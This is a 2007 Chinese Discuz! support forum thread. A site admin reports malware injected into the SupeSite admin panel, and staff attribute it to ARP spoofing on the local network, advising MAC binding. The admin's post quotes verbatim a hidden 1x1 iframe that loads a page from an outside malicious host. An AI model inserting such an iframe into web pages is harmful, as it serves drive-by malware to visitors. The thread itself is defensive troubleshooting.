Discuz! 论坛官方 » □-SS/XS-安装使用 » 恐怖有人中这个木马吗?

立即免费下载 Discuz!6.1.0正式版 Discuz! 6.1.0 使用说明	Discuz!NT升级至v2.1 开放源码下载	UCenter Home 1.2 正式版发布官方站 \| 帮助文档	基于ECShop的免费网店托管-卖否 PHP实战精英班培训 \| LAMP培训大连
Discuz!收费服务内容及价格论坛免费升级手握手	Discuz!/ECShop 专用官方虚拟主机注册付费广告征集	Comsenz 招聘信息网店系统ECShop v2.6.0正式版火热发布	基于Discuz!的免费论坛空间5D6D 第二届PHP中国开源发展及人才状况调查

‹‹ 上一主题 | 下一主题 ››

发新话题

打印

恐怖有人中这个木马吗?

老7

头衔 Lord

星级 Rank: 4

UID: 372849
帖子: 612
积分: 536
威望: 0
金币: 31 个
注册时间: 2006-5-25
最后登录: 2008-7-9

1^# 大中小发表于 2007-1-17 15:39 只看该作者

恐怖有人中这个木马吗?

从昨天开始~SS后台操作发现木马~~~!!!!
在操作过程中,状态栏显示:正在下载http://cool.47555.com/mm.js
查看源文件，则发现被放了代码<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>

太恐怖了～～

从ＦＴＰ上查看了ＡＤＭＩＮ文件夹下的所有文件，又看不出被修改过的痕迹！！！！

怎么办啊？
完整的是这样：
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe><!--Administrator's Control Panel</title>
<link href="http://www.ＡＢＣ.com/admin/images/style.css" rel="stylesheet" type="text/css" />
<link href="http://www.ＡＢＣ.com/images/edit/edit.css" rel="stylesheet" type="text/css" />

TOP

第二届PHP有奖调查

网点

头衔 Forum Legend

星级 Rank: 8 Rank: 8

UID: 104743
帖子: 8229
积分: 9009
威望: 193
金币: 277 个
注册时间: 2004-8-1
最后登录: 2008-7-4

2^# 大中小发表于 2007-1-17 15:42 只看该作者

TEAM组成员会尽快联系你的....
希望保留服务器日志

娱乐行为

TOP

暑期PHP精修班招生开始

老7

头衔 Lord

星级 Rank: 4

UID: 372849
帖子: 612
积分: 536
威望: 0
金币: 31 个
注册时间: 2006-5-25
最后登录: 2008-7-9

3^# 大中小发表于 2007-1-17 15:56 只看该作者

补充说明只在后台操作时候发现~`其他页面则没有~~

谢谢~~
另外,刚才搜索了一下~
有位朋友也中了
http://www.discuz.net/viewthread.php?tid=446662

TOP

暑期PHP精修班招生开始

网点

头衔 Forum Legend

星级 Rank: 8 Rank: 8

UID: 104743
帖子: 8229
积分: 9009
威望: 193
金币: 277 个
注册时间: 2004-8-1
最后登录: 2008-7-4

4^# 大中小发表于 2007-1-17 16:38 只看该作者

可以对照哪个帖排查一下.最好是能够联系服务器管理员 .

娱乐行为

TOP

《PHPer》电子杂志免费下载

mokfly

头衔 Comsenz Team

星级 Rank: 12

UID: 492114
帖子: 51
积分: 118
威望: 7
金币: 5 个
注册时间: 2006-11-16
最后登录: 2008-7-9

5^# 大中小发表于 2007-1-18 12:18 只看该作者

您好,这是您内网有人中了病毒进行arp欺骗攻击.
我建议您联系你的机房管理员,绑顶MAC地址,否则是没有办法解决这样的问题.

当然,您有一些其他什么的问题或是对我的回答有其他看法,可以联系我..

负责解答您对SupeSite/X-space的安全疑问。

其他问题请不要PM我。

TOP

第二届PHP有奖调查

老7

头衔 Lord

星级 Rank: 4

UID: 372849
帖子: 612
积分: 536
威望: 0
金币: 31 个
注册时间: 2006-5-25
最后登录: 2008-7-9

6^# 大中小发表于 2007-1-18 14:14 只看该作者

谢谢我照你说的去看一下~~

另外这个问题似乎是间歇性的有时候出现有时候没出现~
怪在这里~~

TOP

《PHPer》合订本有奖下载

网点

头衔 Forum Legend

星级 Rank: 8 Rank: 8

UID: 104743
帖子: 8229
积分: 9009
威望: 193
金币: 277 个
注册时间: 2004-8-1
最后登录: 2008-7-4

7^# 大中小发表于 2007-1-18 14:25 只看该作者

你发个短消息给MOKFLY吧。。。。
详细再描述一下。

娱乐行为

TOP

《PHPer》电子杂志免费下载

mokfly

头衔 Comsenz Team

星级 Rank: 12

UID: 492114
帖子: 51
积分: 118
威望: 7
金币: 5 个
注册时间: 2006-11-16
最后登录: 2008-7-9

8^# 大中小发表于 2007-1-19 11:20 只看该作者

这样的情况就不奇怪了...

由于是内网的arp,所以间断的出现是很正常的,另外这病毒是寻找title标记然后修改的...

负责解答您对SupeSite/X-space的安全疑问。

其他问题请不要PM我。

TOP

暑期PHP精修班招生开始

免失志

头衔 Member

星级 Rank: 2

UID: 681526
帖子: 168
积分: 134
威望: 0
金币: 0 个
注册时间: 2007-3-15
最后登录: 2008-3-19

9^# 大中小发表于 2007-11-22 08:17 只看该作者

我的今天也中了，惨

TOP

第二届PHP有奖调查

‹‹ 上一主题 | 下一主题 ››

发新话题

版块跳转